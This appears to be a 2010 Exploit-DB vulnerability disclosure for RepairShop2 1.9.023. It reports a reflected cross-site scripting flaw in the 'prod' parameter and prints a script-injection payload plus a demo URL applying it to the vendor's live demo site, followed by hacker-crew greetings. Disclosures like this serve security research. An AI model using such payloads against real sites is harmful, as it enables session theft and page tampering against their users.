RepairShop2 - 'index.php?Prod' Cross-Site Scripting

EDB-ID:

33787


Author:

kaMtiEz

Type:

webapps


Platform:

PHP

Date:

2010-03-23


source: https://www.securityfocus.com/bid/38907/info

RepairShop 2 is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

RepairShop 2 1.9.023 Trial is vulnerable; other versions may also be affected.

#############################################################################################################
## RepairShop2 - cross site scripting ( XSS )	                                                           ##
## Author : kaMtiEz (kamzcrew@yahoo.com)								   ##
## Homepage : http://www.indonesiancoder.com    	     					    	   ##
## Date : 20 March, 2010 						                                   ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.realitymedias.com/
[+] Download : http://www.realitymedias.com/repairshop/?L=downloads
[+] version : 1.9.023
[+] Vulnerability : XSS
[+] Dork : syalalala
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/shop/?b=products.details&prod=[INDONESIANCODER]

[ EXPLOIT ]

"><script>alert(666)</script>

[ DEMO ]

http://n3x.realitymedias.com/rshop_demo/shop/?b=products.details&prod="><script>alert(666)</script>

[ FIX ]

:(


#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31


[ NOTE ] 

[+] Babe enyak adek i love u pull dah .. 
[+] to someone .. satu langkah lagi .. :D
[+] CS-31 : kutunggu di kotaku :">

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..